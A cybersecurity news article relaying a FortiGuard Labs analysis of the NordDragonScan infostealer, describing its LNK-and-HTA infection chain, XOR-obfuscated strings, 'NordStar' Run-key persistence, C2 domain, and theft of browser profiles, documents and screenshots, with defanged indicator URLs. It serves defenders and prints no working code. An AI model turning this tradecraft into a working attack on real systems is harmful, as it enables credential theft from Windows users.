NordDragonScan Targets Windows Users to Steal Login Credentials

FortiGuard Labs has discovered a current campaign that targets Microsoft Windows users with the NordDragonScan infostealer, which is a worrying trend for cybersecurity.

This high-severity threat leverages a complex infection chain to infiltrate systems, harvest sensitive data, and exfiltrate it to a command-and-control (C2) server for potential use in future attacks.

As detailed in the 2025 Global Threat Landscape Report, this malware showcases advanced attacker tactics that demand immediate attention from Windows users and organizations alike.

New Infostealer Exploits Windows Systems

The attack begins with a deceptive initial vector, utilizing shortened URLs like “hxxps://cutt[.]ly/4rnmskDe” that redirect to “hxxps://secfileshare[.]com.”

This prompts the download of a malicious RAR archive with a Ukrainian-themed filename, which contains a harmful LNK shortcut.

Upon execution, this shortcut invokes mshta.exe to run a weaponized HTA script named “1.hta” from the same server.

The HTA script masquerades as a legitimate process by copying PowerShell.exe to a disguised path and distracts users with a benign decoy document in Ukrainian, while silently deploying the core payload, “adblocker.exe,” into the victim’s temporary directory.

This systematic approach, using varied decoy files with the same executable, highlights the attackers’ efforts to evade detection and maximize infection rates across diverse targets.

Once installed, NordDragonScan, a .NET executable with an embedded PDB path pointing to “C:UsersNordDragonDocumentsvisual studio,” employs custom string obfuscation through XOR operations and byte-swapping to hide its hardcoded strings from static analysis.

Sophisticated Tactics

It establishes a working directory named “NordDragonScan” in the local app data folder to stage stolen information.

The malware communicates with its C2 server, “kpuszkiev.com,” using custom HTTP headers and the victim’s MAC address to confirm connectivity and retrieve dynamic URLs for data exfiltration.

Persistence is ensured via a registry entry named “NordStar” under Windows’ CurrentVersionRun key, allowing the malware to survive reboots.

NordDragonScan’s reconnaissance capabilities are extensive. It gathers detailed system information through WMI and .NET calls, capturing details like computer name, OS version, and hardware specs.

It also scans network adapters to map local networks by probing IP addresses within the same subnet.

Beyond system data, it steals files with specific extensions like .docx, .pdf, and .txt from Desktop, Documents, and Downloads folders, alongside entire Chrome and Firefox profiles containing login credentials.

Screenshots are taken and saved as “SPicture.png,” adding to the trove of sensitive data bundled and uploaded to the C2 server with custom headers indicating the type of information being exfiltrated.

Fortinet’s protections, including FortiGuard Antivirus and Content Disarm and Reconstruction services, actively block this threat across FortiGate, FortiMail, FortiClient, and FortiEDR solutions.

Users are urged to exercise caution with untrusted LNK shortcuts and compressed archives, as NordDragonScan’s distribution network remains highly effective.

Indicators of Compromise (IOCs)

Stay Updated on Daily Cybersecurity News, Follow us on Google News, LinkedIn, and X.